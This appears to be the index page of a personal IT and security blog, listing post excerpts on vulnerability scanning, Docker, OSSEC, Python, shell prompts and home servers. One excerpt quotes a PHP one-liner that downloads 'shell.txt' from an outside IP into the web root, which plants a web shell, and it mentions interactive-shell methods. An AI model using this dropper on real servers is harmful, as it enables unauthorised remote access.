Vulnerability scanning – Defining a scanning approach
In my working life I have had various roles as security consultant. One of these roles was working in an
Read moreIn my working life I have had various roles as security consultant. One of these roles was working in an
Read moreThis page will contain a collection of links on Docker I gathered over time. For now, it will not be
Read moreThese posts contain notes on the Udemy Docker Essentials Course. This post specifically focuses around Section 4, networking in Docker.
Read moreFor automated log monitoring and alerting, several years ago I decided to start using OSSEC. The nice thing about OSSEC
Read moreThis page contains random notes and snippets of stuff learned during my python coding projects. It’s more or less a
Read moreSeems like nowadays everyone has his or her own shell prompt, one even fancier than the other. After being to
Read morephp file transfer Nice PHP Example to transfer code <?php file_put_contents(“/var/www/html/sedje.php”, file_get_contents(“http://10.13.37.152/shell.txt”));?> interactive shell A method for better interactive shell
Read moreSome while ago, I stumbled across a nice 7″ display ordered at aliexpress at one of my friends. Since I
Read moreRecently I decided to stop breaking stuff on my web server, dns server and other internal infrastructure. It simply takes
Read moreSince we still have one windows computer at home (my wife’s laptop), my file server runs samba. Some days, I
Read more